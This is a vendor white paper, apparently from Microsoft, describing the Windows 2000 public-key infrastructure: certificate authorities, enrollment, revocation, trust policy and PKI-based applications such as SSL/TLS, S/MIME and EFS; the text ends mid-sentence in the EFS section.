Deploying an Enterprise CA9 Trust In Multiple CA Hierarchies11 Enabling Domain Clients12 Generating Keys12 Key Recovery12 Certificate Enrollment13 Renewal13 Using Keys and Certificates13 Recovery14 Roaming15 Revocation15 Trust15 PK Security Policy in Windows 200017 Trusted CA Roots17 Certificate Enrollment and Renewal17 Smart-Card Logon18 Applications Overview19 Web Security19 Secure E-mail20 Digitally Signed Content21 Encrypting File System21 Smart-Card Logon22 IP Security (IPSec)22 Interoperability23 Criteria23 Internet Standards23 Preparing for Windows 2000 PKI26 S/MIME-based E-mail Using Exchange Server26 For More Information27 Introduction The Microsoft Windows 2000 operating system introduces a comprehensive public-key infrastructure (PKI) to the Windows platform. This infrastructure extends the Windows-based public-key (PK) cryptographic services that were introduced over the past few years, providing an integrated set of services and administrative tools for creating, deploying, and managing PK-based applications. This allows application developers to take advantage of the shared-secret security mechanisms or PK-based security mechanism, as appropriate. Enterprises also gain the advantage of being able to manage the environment and applications with consistent tools and policies. The remainder of this paper provides an overview of the PKI in Windows 2000. Concepts Public Key Cryptography Cryptography is the science of protecting data. Cryptographic algorithms mathematically combine input plaintext data and an encryption key to generate encrypted data (ciphertext). With a good cryptographic algorithm, it is computationally not feasible to reverse the encryption process and derive the plaintext data, starting with only the ciphertext; some additional data, a decryption key, is needed to perform the transformation. In traditional, secret (or symmetric) key cryptography, the encryption and decryption keys are identical and thus share sensitive data. Parties wishing to communicate with secret-key cryptography must securely exchange their encryption/decryption keys before they can exchange encrypted data. In contrast, the fundamental property of public-key (PK) cryptography is that the encryption and decryption keys are different. Encryption with a public key encryption key is a one-way function; plaintext turns into ciphertext, but the encryption key is irrelevant to the decryption process. A different decryption key (related, but not identical, to the encryption key) is needed to turn the ciphertext back into plaintext. Thus, for PK cryptography, every user has a pair of keys, consisting of a public key and a private key. By making the public key available, it is possible to enable others to send you encrypted data that can only be decrypted using your private key. Similarly, you can transform data using your private key in such a way that others can verify that it originated with you. This latter capability is the basis for digital signatures, discussed below. Public-Key Functionality The separation between public and private keys in PK cryptography has allowed the creation of a number of new technologies. The most important of these are digital signatures, distributed authentication, secret-key agreement via public key, and bulk data encryption without prior shared secrets. There are a number of well-known PK cryptographic algorithms. Some, such as Rivest-Shamir-Adleman (RSA) and Elliptic Curve Cryptography (ECC), are general-purpose; they can support all of the above operations. Others support only a subset of these capabilities. Some examples include the Digital Signature Algorithm (DSA, which is part of the U.S. government's Digital Signature Standard, FIPS 186), which is useful only for digital signatures, and Diffie-Hellman (D-H), which is used for secret key agreement. The following sections briefly describe the principal uses of PK cryptography. These operations are described in terms of two users, Bob and Alice. It is assumed that Bob and Alice can exchange information but do not have any pre-arranged, shared secrets between them. Digital Signatures Perhaps the most exciting aspect of public key cryptography is creating and validating digital signatures. This is based on a mathematical transform that combines the private key with the data to be signed in such a way that: Only someone possessing the private key could have created the digital signature. Anyone with access to the corresponding public key can verify the digital signature. Any modification of the signed data (even changing only a single bit in a large file) invalidates the digital signature. Digital signatures are themselves just data, so they can be transported along with the signed data that they protect. For example, Bob can create a signed e-mail message to Alice and send the signature along with the message text, providing Alice the information that is required to verify the message origin. In addition, digital signatures provide a way to verify that data has not been tampered with (either accidentally or intentionally) while in transit from the source to the destination. Therefore, they can be exploited to provide a very secure data-integrity mechanism. Authentication PK cryptography provides robust distributed authentication services. Entity authentication guarantees that the sender of data is the entity that the receiver thinks it is. If Alice receives data from Bob, and then sends him a challenge encrypted with Bob's public key, Bob then decodes this challenge and sends it back to Alice, proving that he has access to the private key associated with the public key that Alice used to issue the challenge. Alice can also send a plaintext challenge to Bob. Bob then combines the challenge with other information, which is digitally signed. Alice then uses Bob's public key to verify the signature and prove that Bob has the associated private key. The challenge makes this message unique and prevents replay attacks by a hostile third party. In either case, this is known as a proof-of-possession protocol because the sender proves that he has access to a particular private key. Secret Key Agreement via Public Key Another feature of PK cryptography is that it permits two parties to agree on a shared secret, using public, and nonsecure, communication networks. Basically, Bob and Alice each generate a random number that forms half of the shared secret key. Bob then sends his half of the secret, encrypted, to Alice, using her public key. Alice sends her half, encrypted, to Bob with his public key. Each side can then decrypt the message received from the other party, extract the half of the shared secret that was generated by the other, and combine the two halves to create the shared secret. Once the protocol is completed, the shared secret can be used for securing other communications. Bulk Data Encryption without Prior Shared Secrets The fourth major technology enabled by PK cryptography is the ability to encrypt bulk data without the establishment of prior shared secrets. Existing PK algorithms are computationally intensive relative to secret-key algorithms. This makes them ill suited for encrypting large amounts of data. To get the advantages of PK cryptography along with efficient bulk encryption, PK and secret-key technologies are typically combined. This is accomplished by first selecting a secret-key encryption algorithm and generating a random session key to use for data encryption. If Bob is sending the message, he first encrypts this session key, using Alice's public key. The resulting ciphertext key is then sent to Alice along with the encrypted data. Alice can recover the session key, using her private key, and then use the session key to decrypt the data. Protecting and Trusting Cryptographic Keys In secret-key cryptography, Alice and Bob trust their shared-secret key because they mutually agreed on it or exchanged it in a secure manner, and each has agreed to keep it stored securely to prevent access by a malicious third party. In contrast, using PK cryptography, Alice need only protect her private key and Bob, his private key. The only information they need to share is their public keys. They need to be able to identify the other's public key with positively, but they need not keep it secret. This ability to trust the association of a public key with a known entity is critical to the use of PK cryptography. Alice might trust Bob's public key because Bob handed it to Alice directly in a secure manner, but this presupposes that Alice and Bob have had some form of prior secure communication. More likely, Alice has obtained Bob's public key through a nonsecure mechanism (for example, from a public directory), so some other mechanism is needed to give Alice confidence that the public key that she holds claiming to be from Bob really is Bob's public key. One such mechanism is based on certificates issued by a certificate authority (CA). Certificates Certificates provide a mechanism for gaining confidence in the relationship between a public key and the entity that owns the corresponding private key. A certificate is a digitally signed statement dealing with a particular subject public key, and the certificate is signed by its issuer (holding another pair of private and public keys). Typically, certificates also contain other information related to the subject public key, such as identity information about the entity that has access to the corresponding private key. Thus, when issuing a certificate, the issuer is attesting to the validity of the binding between the subject public key and the subject identity information. The most common form of certificates in use today is based on the ITU-T X.509 standard. This is a fundamental technology used in the Windows 2000 PKI. It is, however, not the only form of certificates. Pretty Good Privacy (PGP) secure e-mail, for example, relies on a form of certificates unique to PGP. Certificate Authorities A certificate authority (CA) is an entity or service that issues certificates. A CA acts as a guarantor of the binding between the subject public key and the subject identity information that is contained in the certificates it issues. Different CAs may choose to verify that binding through different means, so it is important to understand the authority's policies and procedures before choosing to trust that authority to vouch for public keys. Trust and Validation The fundamental question facing Alice when she receives a signed message is whether she should trust that the signature is valid and was made by whoever claimed to make it. Alice can confirm that the signature is mathematically valid; that is, she can verify the integrity of the signature, using a known public key. However, Alice must still determine whether the public key used to verify the signature does, in fact, belong to the entity claiming to have made the signature in the first place. If Alice does not implicitly trust the public key to be Bob's, she needs to acquire strong evidence that the key belongs to Bob. If Alice can locate a certificate, which was issued by a CA that Alice implicitly trusts, for Bob's public key, Alice can trust that Bob's public key really belongs to Bob. That is, Alice is likely to trust that she really has Bob's public key if she finds a certificate that: Has a cryptographically valid signature from its issuer. Attests to a binding between the name Bob and Bob's public key. Was issued by an issuer that Alice trusts. Assuming that Alice finds such a certificate for Bob's public key, she can verify its authenticity, using the public key of the issuing CA, Ira. However, Alice is now faced with the same dilemma. How does she know that the public key actually belongs to Ira? Alice now needs to find a certificate attesting to the identity of Ira and the binding between Ira and Ira's public key. Ultimately, Alice ends up constructing a chain of certificates leading from Bob and Bob's public key through a series of CAs and terminating in a certificate issued to someone that Alice implicitly trusts. Such a certificate is called a trusted root certificate because it forms the root (top node) of a hierarchy of public keys/identity bindings that Alice accepts as authentic (see section 4.1, Certificate Hierarchies). When Alice chooses to explicitly trust a particular trusted root certificate, she is implicitly trusting all the certificates issued by that trusted root, as well as all certificates issued by any subordinate CA certified by the trusted root. The set of trusted root certificates that Alice explicitly trusts is the only information that Alice must acquire in a secure manner. That set of certificates secures Alice's trust system and her belief in the public-key infrastructure. Windows 2000 PKI Components Figure 1 presents a top-level view of the components that make up the Windows 2000 PKI. This is a logical view and does not imply physical requirements for separate servers; in fact, many functions may be combined on a single-server system. A key element in the PKI is Microsoft Certificate Services. This allows you to deploy one or more enterprise CAs. These CAs support certificate issuance and revocation. They are integrated with Active Directory, which provides CA location information and CA policy, and allows certificates and revocation information to be published. The PKI does not replace the existing Windows domain trust-and-authorization mechanisms based on the domain controller (DC) and Kerberos Key Distribution Center (KDC). Rather, the PKI works with these services and provides enhancements that allow applications to readily scale to address extranet and Internet requirements. In particular, PKI addresses the need for scalable and distributed identification and authentication, integrity, and confidentiality. Figure 1. Windows 2000 public-key infrastructure components Support for creating, deploying, and managing PK-based applications is provided uniformly on workstations and servers running Windows 2000 or Windows NT, as well as workstations running Windows 95 and Windows 98 operating systems. Figure 2 provides an overview of these services. Microsoft CryptoAPI is the cornerstone for these services. It provides a standard interface to cryptographic functionality supplied by installable cryptographic service providers (CSPs). These CSPs may be software-based or take advantage of cryptographic hardware devices and can support a variety of algorithms and key strengths. As indicated in the figure, one possible hardware-based CSP supports smart cards. Some CSPs that ship with Windows 2000 take advantage of the Microsoft PC/SC-compliant smart card infrastructure (see http://www.Microsoft.com/smartcard/ and http://www.smartcardsys.com/). Layered on the cryptographic services is a set of certificate management services. These support X.509 version 3 standard certificates, providing persistent storage, enumeration services, and decoding support. Finally, there are services for dealing with industry-standard message formats. Primarily, these support the PKCS standards and evolving Internet Engineering Task Force (IETF) Public Key Infrastructure, X.509 (PKIX) draft standards. Other services take advantage of CryptoAPI to provide additional functionality for application developers. Secure Channel (schannel) supports network authentication and encryption using the industry standard TLS and SSL protocols. These may be accessed using the Microsoft WinInet interface for use with the HTTP protocol (HTTPS) and with other protocols through the SSPI interface. Authenticode supports object signing and verification. This is used principally for determining origin and integrity of components downloaded over the Internet, though it may be used in other environments. Finally, general-purpose smart-card interfaces are supported. These are used to integrate cryptographic smart cards in an application-independent manner and are the basis for the smart-card logon support that is integrated with Windows 2000. Figure 2. Public-key application services Certificate Authorities Microsoft Certificate Services, included with Windows 2000, provides a means for an enterprise to easily establish CAs to support its business requirements. Certificate Services includes a default policy module that is suitable for issuing certificates to enterprise entities (users, computers, or services). This includes identification of the requesting entity and validation that the certificate requested is allowed under the domain PK security policy. This may be easily modified or enhanced to address other policy considerations or to extend CA support for various extranet or Internet scenarios. Since Certificate Services is standards-based, it provides broad support for PK-enabled applications in heterogeneous environments. Within the PKI, you can easily support both enterprise CAs and external CAs, such as those associated with other organizations or commercial service providers. This allows an enterprise to tailor its environment in response to business requirements. Certificate Hierarchies The Windows 2000 PKI assumes a hierarchical CA model. This was chosen for its scalability, ease of administration, and consistency with a growing number of commercial and third-party CA products. In its simplest form, a CA hierarchy consists of a single CA, though in general, a hierarchy contains multiple CAs with clearly defined parent-child relationships, as shown in Figure 3. As shown, there may be multiple unconnected hierarchies of interest. There is no requirement that all CAs share a common top-level CA parent (or root). In this model, children are certified by parent CA–issued certificates, which bind a CA's public key to its identity and other policy-driven attributes. The CA at the top of a hierarchy is generally referred to as a root CA. The subordinate CAs are often referred to as intermediate or issuing CAs. In this paper, a CA that issues end-entity certificates is called an issuing CA. Intermediate CA refers to a CA that is not a root CA, but that only certifies other CAs. Figure 3. Certificate authority hierarchies The fundamental advantage of this model is that verification of certificates requires trust in only a relatively small number of root CAs. At the same time, it provides flexibility in the number of issuing CAs. There are several practical reasons for supporting multiple issuing CAs. These include: Usage—Certificates may be issued for a number of purposes (for example, secure e-mail, network authentication, and so on). The issuing policy for these uses may be distinct, and separation provides a basis for administering these polices. Organizational divisions—There may be different policies for issuing certificates, depending upon an entity's role in the organization. Again, you can create issuing CAs to separate and administer these policies. Geographic divisions—Organizations may have entities at multiple physical sites. Network connectivity between these sites may dictate a requirement for multiple issuing CAs to meet usability requirements. Such a CA hierarchy also provides administrative benefits, including: Flexible configuration of CA security environment (key strength, physical protection, protection against network attacks, and so on) to tailor the balance between security and usability. For example, you may choose to employ special-purpose cryptographic hardware on a root CA, operate it in a physically secure area, or operate it offline. These may be unacceptable for issuing CAs, due to cost or usability considerations. Use of fairly frequent updates for issuing CA keys and/or certificates, which are the most exposed to compromise, without requiring a change to established trust relationships. The ability to turn off a specific portion of the CA hierarchy without affecting the established trust relationships. For example, you can easily shut down and revoke an issuing CA certificate associated with a specific geographic site without affecting other parts of the organization. In general, CA hierarchies tend to be static, though this is not a requirement. You can add or delete issuing CAs under a given root CA fairly easily. You can also merge existing CA hierarchies by issuing a certificate from one of the root CAs certifying the other root as an intermediate CA. However, before doing this, you should carefully consider policy inconsistencies that this could introduce and the impact of depth constraints that may be encoded into existing certificates. Deploying an Enterprise CA Deploying Microsoft Certificate Services is a fairly straightforward operation. It is recommended that you establish the domain prior to creating a CA. Then establish an enterprise root CA, or CAs. The Certificate Services installation process walks the administrator through this process. Key elements in this process include: Selecting the host server—The root CA can run on any Windows 2000 Server platform, including a domain controller. Factors such as physical security requirements, expected loading, connectivity requirements, and so on, should be considered in making this decision. Naming—CA names are bound into their certificates and hence can not change. You should consider factors such as organizational naming conventions and future requirements to distinguish among issuing CAs. Key generation—The CA's public-key pair is generated during the installation process and is unique to this CA. CA certificate—For a root CA, the installation process automatically generates a self-signed CA certificate, using the CA's public/private-key pair. For a child CA, a certificate request can be generated that may be submitted to an intermediate or root CA. Active Directory integration—Information concerning the CA is written into a CA object in the Active Directory during installation. This provides information to domain clients about available CAs and the types of certificates that they issue. Issuing policy—The enterprise CA setup automatically installs and configures the Microsoft-supplied Enterprise Policy Module for the CA. An authorized administrator can modify the policy, although in most cases this is not necessary. After a root CA has been established, it is possible to install intermediate or issuing CAs subordinate to this root CA. The only significant difference in the installation policy is that a certificate request is generated for submission to a root or intermediate CA. This request may be routed automatically to online CAs located through the Active Directory, or routed manually in an offline scenario. In either case, the resultant certificate must be installed at the CA before it can begin operation. There is an obvious relationship between the enterprise CAs and the Windows 2000 domain trust model, but, this does not imply a direct mapping between CA trust relationships and domain trust relationships. Nothing prevents a single CA from servicing entities in multiple domains, or even entities outside the domain boundary. Similarly, a domain may have multiple enterprise CAs. CAs are high-value resources, and it is often desirable to provide them with a high degree of protection, as discussed above. Specific actions that should be considered include: Physical protection—Since CAs represent highly trusted entities within an enterprise, protect them from tampering. This requirement is dependent upon the inherent value of the certification made by the CA. Physical isolation of the CA server, in a facility accessible only to security administrators, can dramatically reduce the possibility of such attacks. Key management—The CA keys are its most valuable asset because the private key provides the basis for trust in the certification process. Cryptographic hardware modules (accessible to Certificate Services through a CryptoAPI CSP) can provide tamper-resistant key storage and isolate the cryptographic operations from other software that is running on the server. This significantly reduces the likelihood that a CA key will be compromised. Restoration—Loss of a CA due to hardware failure, for example, can create a number of administrative and operational problems, as well as prevent revocation of existing certificates. Certificate Services supports backup of a CA instance so that it can be restored at a later time. This is an important part of the overall CA management process. Trust In Multiple CA Hierarchies Based on the preceding discussion, it is evident that the Windows 2000 PKI must deal with trust relationships across multiple CA hierarchies. This could involve only CA hierarchies within a single enterprise, but may involve hierarchies within multiple enterprises, as well as commercial CAs (such as VeriSign, Thawte, and others). Within the PKI, you can administratively establish and enforce CA-based trust relationships based on the Windows 2000 domain policy objects. For each trusted root CA, the system provides a means to apply usage restrictions on certificates that are issued by the CA. For example, you could choose to validate only certificates that are issued by a CA for server authentication, even if the CA issues certificates for several purposes. In addition, individual users can add CA trust relationships that apply only to themselves. This is done using client functionality and does not involve administrative action. An alternative to explicitly including all trusted root CAs in a policy object, is to use cross certificates. These have been used by at least one vendor's PKI product and provide a means to create a chain of trust from a single, trusted, root CA to multiple other CAs. Windows 2000 PKI is capable of processing such cross certificates and using them in making trust decisions, but they are unnecessary in this model. Microsoft chose this approach because of the issues that cross certificates raise, notably: Uncertain interpretation of cross certification across organization boundaries when the CAs implement disparate policies. Interpretation of cross certification in the absence of existing business agreements covering their use. Additional administrative burden of generating and maintaining cross certificates. Enabling Domain Clients Windows 2000 provides a comprehensive set of core services supporting the development and deployment of interoperable PK-based applications. These core services are also available on Windows NT 4.0, Windows 98, and Windows 95. The most significant new feature of the Windows 2000 implementation is integration with the domain administration and policy model, dramatically simplifying application management within the enterprise. The remainder of this section discusses the core application services that provided by the PKI. Generating Keys Use of PK technology is dependent upon the ability to generate and manage keys for one or more PK algorithms. the Microsoft CryptoAPI supports installable CSPs that support key generation and management for a variety of cryptographic algorithms. The CryptoAPI defines standard interfaces for generating and managing keys that are the same for all CSPs. Mechanisms for storing key material are dependent on the selected CSP. The Microsoft-provided software CSPs (or base CSPs) store key material in an encrypted form on a per-user or per-computer basis. They also support control over public-key pair exportability (CRYPT_EXPORTABLE flag) and usage control (CRYPT_USER_PROTECT flag). The former controls private-key export from the CSP; the latter determines user-notification behavior when an application attempts to use the private key. Other CSPs may implement different mechanisms. For example, smart card CSPs store the public-key pair in the smart card tamper-resistant hardware and generally require entry of a PIN code to access operations involving the private key. These protection mechanisms are transparent to an application, which references all key pairs through a key-set name that is unique in the context of a CSP. Key Recovery The CryptoAPI architecture is compatible with, but does not mandate, key recovery. In this context, key recovery implies persistent storage of an entity's private key, allowing access by authorized individuals without knowledge or consent of the owning entity. Typically, this is necessary to ensure access to critical business correspondence or to meet law-enforcement requirements. Key recovery is useful only when applied to keys that are used in the encryption of persistent data. For PK-based applications, this usually implies an entity's key-exchange keys. There is questionable value, and considerable danger, in archiving identification or digital-signature private keys because their only practical use would be for impersonation of the private key owner. Microsoft Exchange currently provides support for recovery of key-exchange keys so that encrypted e-mail can be read. In addition, third-party CSPs are available that provide general support for key recovery. Microsoft may include additional key-recovery functionality in the future, depending upon customer demand. Certificate Enrollment As mentioned, practical use of PK-based technology generally relies on certificates to bind public keys to known entities. The Windows 2000 PKI supports certificate enrollment to the Microsoft enterprise CA or third-party CAs. Enrollment support is implemented in a transport-independent manner and is based on use of industry-standard PKCS-10 certificate request messages and PKCS-7 responses containing the resulting certificate or certificate chain. At this time, certificates that support RSA keys and signatures, Digital Signature Algorithm (DSA) keys and signatures, and Diffie-Hellman keys are supported. Support for PKCS-10 and PKCS-7 messages is provided by a Microsoft-supplied enrollment control (Xenroll.dll), which can be scripted for Web-based enrollment or called programmatically to support other transport mechanisms, such as RPC, DCOM, and e-mail. This control allows the calling application to specify the attributes included in the PKCS-10 message and allows use of an existing key pair or generation of a new key pair. The enrollment process is assumed to be asynchronous, and the enrollment control provides state management to match issued certificates against pending requests. This provides a means of creating an internal binding between the certificate, the CSP that generated the key pair, and the key-pair container name. The PKI supports multiple enrollment methods, including Web-based enrollment, an enrollment wizard, and policy-driven auto-enrollment, which occurs as part of a user's logon processing. In the future, the certificate enrollment process will evolve in a manner consistent with the Certificate Request Syntax (CRS) draft current in the IETF PKIX working group. Renewal Certificate renewal is conceptually similar to enrollment, but takes advantage of the trust relationship inherent in an existing certificate. Renewal assumes that the requesting entity wants a new certificate with the same attributes as an existing, valid certificate, but with extended validity dates. A renewal may use the existing public key or a new public key. Renewal is of advantage primarily to the CA. A renewal request can presumably be processed more efficiently since the existing certificate attributes need not be reverified. Renewal is currently supported in the Windows 2000 PKI for automatically enrolled certificates. For other mechanisms, a renewal is treated as a new enrollment request. Industry-standard message protocols for certificate renewal are not yet defined, but are included in the IETF PKIX CRS draft. Once these standards are ratified, Microsoft plans to implement the associated message formats. Using Keys and Certificates Within the Microsoft PKI, cryptographic keys and associated certificates are stored and managed by the CryptoAPI subsystem. As noted, keys are managed by CSPs, and certificates are managed by the CryptoAPI certificate stores. The certificate stores are repositories for certificates and their associated properties. By convention, the PKI defines five standard certificate stores: MY—This store is used to hold a user's or computer's certificates for which the associated private key is available. CA—This store is used to hold issuing or intermediate CA certificates to use in building certificate-verification chains. TRUST—This store is used to hold Certificate Trust Lists (CTLs). These are an alternate mechanism that allows an administrator to specify a collection of trusted CAs. An advantage is that they may be transmitted over nonsecure links, because they are digitally signed. ROOT—This store holds only self-signed CA certificates for trusted root CAs. UserDS—This store provides a logical view of a certificate repository that is stored in the Active Directory (for example, in the userCertificate property of the User object). Its purpose is to simplify access to these external repositories. These are logical stores that can present a consistent, system-wide view of the available certificates that may reside on multiple physical stores (hard disk, smart cards, and so on). By using these services, applications can share certificates and are assured of consistent operation under administrative policy. The certificate management functions support decoding of X.509 v3 certificates and provide enumeration functions to assist in locating a specific certificate. To simplify application development, the MY store maintains certificate properties that indicate the CSP and key-set name for the associated private key. Once an application has selected a certificate to use, it can use this information to obtain a CSP context for the correct private key. Recovery Public key pairs and certificates tend to have high value. If they are lost due to system failure, their replacement may be time consuming and expensive. Therefore,, the Windows 2000 PKI supports the ability to back up and restore both certificates and associated key pairs through the certificate-management administrative tools. When exporting a certificate, using the certificate manager, the user must specify whether to also export the associated key pair. If this option is selected, the information is exported as an encrypted (based on a user-supplied password) PKCS-12 message. This may later be imported to the system, or another system, to restore the certificate and keys. This operation assumes that the key pair is exportable by the CSP. This is true for the Microsoft base CSPs if the exportable flag was set at key generation. Third-party CSPs may or may not support private key export. For example, smart card CSPs do not generally support this operation. For software CSPs with nonexportable keys, the alternative is to maintain a complete system-image backup, including all registry information. Roaming Roaming in the context of this paper means the ability to use the same PK-based applications on different computers within the enterprise Windows environment. The principal requirement is to make a user's cryptographic keys and certificates available wherever he or she logs on. The Windows 2000 PKI supports this in two ways. First, if the Microsoft base CSPs are used, roaming of keys and certificates is supported by the roaming profile mechanism. This is transparent to the user once roaming profiles are enabled. It is unlikely that this functionality will be supported by third-party CSPs because they generally use a different method of preserving key data, often on hardware devices. Second, hardware token devices, such as smart cards, support roaming, provided that they incorporate a physical certificate store. The smart card CSPs that ship with the Windows 2000 platform support this functionality. The user carries the hardware token to the new location. Revocation Certificates tend to be long-lived credentials, and there are a number of reasons why these credentials may become untrustworthy prior to their expiration. Examples include: Compromise, or suspected compromise, of an entity's private key. Fraud in obtaining the certificate. Change in status. PK-based functionality assumes distributed verification in which there is no need for direct communication with a central trusted entity that vouches for these credentials. This creates a need for revocation information that can be distributed to individuals attempting to verify certificates. The need for revocation information, and its timeliness, is dependent upon the application. To support a variety of operational factors, the Windows 2000 PKI incorporates support of industry-standard Certificate Revocation Lists (CRLs). Enterprise CAs support certificate revocation and CRL publication to the Active Directory under administrative control. Domain clients can obtain this information and cache it locally to use when verifying certificates. This same mechanism supports CRLs published by commercial CAs or third-party certificate server products, provided that the published CRLs are accessible to clients over the network. Trust The principal client trust concern when using PK-based functionality is the trust associated with certificate verification. This is generally based on the trust associated with the CA that issued the certificate. As discussed, the PKI assumes a rooted CA hierarchy in which the control of trust is based on decisions concerning root CAs. If a specified end-entity certificate can be shown to chain to a known trusted root CA, and if the intended certificate usage is consistent with the application context, it is considered valid. If either of these conditions is not present, it is considered invalid. Within the PKI, users may make trust decisions that affect only themselves. They do this by installing or deleting trusted root CAs and configuring associated usage restrictions with the certificate-management administrative tools. This should be the exception, rather than the rule. These trust relationships should be established as part of the enterprise policy (See the following section, PK Security Policy in Windows 2000.) Trust relationships established by policy are automatically propagated to Windows 2000–based client computers. PK Security Policy in Windows 2000 Security policies can be applied to sites, domains, or organizational units (OUs), and affect the associated security groups of users and computers. PK security policy is only one aspect of the overall Windows security policy and is integrated into this structure. It provides a mechanism to centrally define and manage policy, while enforcing it globally. The most significant aspects of PK security policy are discussed below. Trusted CA Roots Trust in root CAs may be set by policy to establish trust relationships used by domain clients in verifying PK certificates. The set of trusted CAs is configured using the Group Policy Editor. It can be configured on a per-computer basis and apply globally to all users of that computer. In addition to establishing a root CA as trusted, the administrator can set usage properties associated with the CA. If specified, these restrict the purposes for which the CA-issued certificates are valid. Restrictions are specified based on object identifiers (OIDs) as defined for ExtendedKeyUsage extensions in the IETF PKIX Part 1 draft. Currently, these provide a means of restricting use to any combination of the following: Server authentication Client authentication Code signing E-mail IP Security (IPSec) end system IPSec tunnel IPSec user Time-stamping Microsoft Encrypted File System Certificate Enrollment and Renewal As part of the overall PKI integration with Windows 2000, policy mechanisms have been defined to support an automated certificate enrollment process. This is controlled by two key elements: certificate types and auto-enrollment objects. These are integrated with the Group Policy Object and may be defined on a site, domain, OU, computer, or user basis. Certificate types provide a template for a certificate and associate it with a common name, for ease of administration. The template defines elements such as naming requirements, validity period, allowable CSPs for private key generation, algorithms, and extensions that should be incorporated into the certificate. The certificate types are logically separated into computer and user types and applied to the policy objects accordingly. Once defined, these certificate types are available for use with the auto-enrollment objects and certificate-enrollment wizard. This mechanism is not a replacement for the enterprise CA issuing policy, but is integrated with it. The CA service receives a set of certificate types as part of its policy object. These are used by the Enterprise Policy Module to define the types of certificates that the CA is allowed to issue. The CA rejects requests for certificates that fail to match these criteria. The auto-enrollment object defines policy for certificates that an entity in the domain should have. This can be applied on a computer and user basis. The types of certificates are incorporated by reference to the certificate type objects and may be any defined type. The auto-enrollment object provides sufficient information to determine whether an entity has the required certificates and to enroll for those certificates with an enterprise CA, if they are missing. The auto-enrollment objects also define policy on certificate renewal. This can be set by an administrator to occur before certificate expiration, supporting long-term operation without direct user action. The auto-enrollment objects are processed and any required actions taken whenever policy is refreshed (logon time, GPO refresh, and so on). Smart-Card Logon Smart-card logon (also see the section on smart-card logon in the Applications Overview section below) is controlled by policy associated with the user object in a manner analogous to password policy. Policy may be set either to enable smart-card logon, in which case password-based logon may still be used, or to enforce smart-card logon. In the latter case, protection against unauthorized access to the account is significantly stronger. It does mean however, that users are unable to log on if they forget their smart card or attempt to use a computer lacking a smart-card reader. Applications Overview This section provides an overview of significant applications that currently take advantage of PK-based functionality. It is intended to serve as an introduction to the ways you can use PKI to solve real-world business needs. Web Security The Web has rapidly become a key element in creating and deploying solutions for the effective exchange of information on a worldwide basis. In particular, growth in its use for business purposes has been dramatic. For many uses, security is a key consideration. Notably: Server authentication—To enable clients to verify the server they are communicating with. Client authentication—To allow servers to verify the client's identity and use this as a basis for access-control decisions. Confidentiality—Encryption of data between clients and servers to prevent its exposure over public Internet links. The Secure Sockets Layer (SSL) and the emerging IETF standard Transport Layer Security (TLS) protocols play an important role in addressing these needs. SSL and TLS are flexible security protocols that can be layered on top of other transport protocols. They rely on PK-based authentication technology and use PK-based key negotiation to generate a unique encryption key for each client/server session. They are most commonly associated with Web-based applications and the HTTP protocol (referred to as HTTPS). SSL and TLS are supported on the Windows platform by the secure channel (Schannel) SSPI provider. Microsoft Internet Explorer and Internet Information Services both use Schannel for this functionality. Because Schannel is integrated with Microsoft's SSPI architecture, it is available for use with multiple protocols to support authenticated and/or encrypted communications. Taking full advantage of the SSL and TLS protocols requires both clients and servers to have identification certificates issued by mutually trusted CAs, allowing the parties to authenticate each other. In this mode, certificates are exchanged along with data that proves possession of the corresponding private key. Each side can then validate the certificate and verify possession of the private key, using the certificate's public key. The identifying information included in the certificate can then be used to make supplemental access-control decisions. For example, the client can decide whether the server is someone that it wishes to conduct business with, and the server can decide what data the client can access. Windows 2000 PKI integrates support for the latter decisions as a standard feature of Windows 2000 Server. User certificates can be mapped on a one-to-one or many-to-one basis against security principals (User objects) in the Active Directory. Schannel can take advantage of this information to automatically synthesize a security token for the client so that the Windows ACL mechanisms are used to enforce access control to resources. This is advantageous for services because they can use the identical access-control mechanism independent of the client-authentication mechanism used (PK or Kerberos). Once the client and server have authenticated each other, they can negotiate a session key and begin communicating securely. SSL and TLS are also often employed in a mode that does not require client authentication. Use of mutual authentication is recommended in the enterprise environment, however, because it allows you to make use of the Windows-based access control mechanisms. Also, the PKI significantly simplifies certificate enrollment and management, reducing the burden on the client. Secure E-mail PK-based secure e-mail products, including Microsoft Exchange, have been available for a number of years and are widely deployed. These systems rely on PK technology for: Digital signatures, to prove origin and authenticity of an e-mail message. Bulk encryption without prior shared secrets, for confidentiality between correspondents. The distributed nature of e-mail, and the reliance on store-and-forward transport to multiple recipients, have been decisive factors in the use of PK technology. Alternate approaches, based on shared-secret cryptography, impose administrative and physical security requirements that make them difficult to use. A limitation of some early implementations was the lack of cross-vendor interoperability. In the absence of suitable standards, vendors implemented systems that relied on proprietary protocols, message encodings, and trust assumptions that effectively defined non-interoperable PKIs. (PGP, though in fairly wide use, is in this category because its messaging formats never became a basis for interoperable secure e-mail applications within the industry at large.) Only recently has a basis for interoperable secure e-mail systems emerged from major vendors, with the proposed IETF S/MIME version 3 standard, which builds upon the S/MIME version 2 proposal from RSA Data Security. Despite its draft status, S/MIME is currently implemented by a number of products, including Microsoft Outlook® 98 messaging and collaboration client and Microsoft Outlook Express, with proven interoperability between vendors for PK encryption and digital signatures, using RSA algorithms. In operation, these systems use a user's private key to digitally sign outgoing e-mail. The user's certificate is then sent along with the e-mail so that the recipient can verify the signature. S/MIME defines a profile for these certificates to ensure interoperability and assumes a hierarchical CA model to provide scalable trust management. To encrypt e-mail, the user obtains the encryption certificate of the recipient, either from prior e-mail or a directory service. Once this certificate is verified, the user can use the contained public key to encrypt the secret key used to encrypt the e-mail. Digitally Signed Content The growing use of the Internet has driven reliance on downloaded active content, such as Windows-based applications, ActiveX® controls, and Java applets. The result has been a heightened concern for the safety of such downloads, since they often occur as a side effect of Web scripts without any specific user notification. In response to these concerns, Microsoft introduced AuthenticodeTM digital signature technology in 1996 and introduced significant enhancements in 1997. Authenticode technology allows software publishers to digitally sign any form of active content, including multiple-file archives. These signatures may be used to verify both the publishers of the content and the content integrity at download time. This verification infrastructure scales to the worldwide base of users of Windows by relying on a hierarchical CA structure in which a small number of commercial CAs issue software-publishing certificates. For enterprise needs, the Windows 2000 PKI allows you to issue Authenticode certificates to internal developers or contractors and allows any employee to verify the origin and integrity of downloaded applications. Encrypting File System The Windows 2000 Encrypting File System (EFS) supports transparent encryption and decryption of files stored on a disk in the Windows NT file system (NTFS). The user can designate individual files to encrypt or folders whose contents are to be maintained in encrypted form. Applications have access to a user's encrypted files in the same manner as unencrypted files. However, they cannot decrypt any other user's encrypted files. EFS makes extensive use of PK-based technology to provide mechanisms for encrypting files to multiple users as well as supporting file recovery. To do this, it utilizes the ability of PK to support bulk encryption without prior shared secrets. In 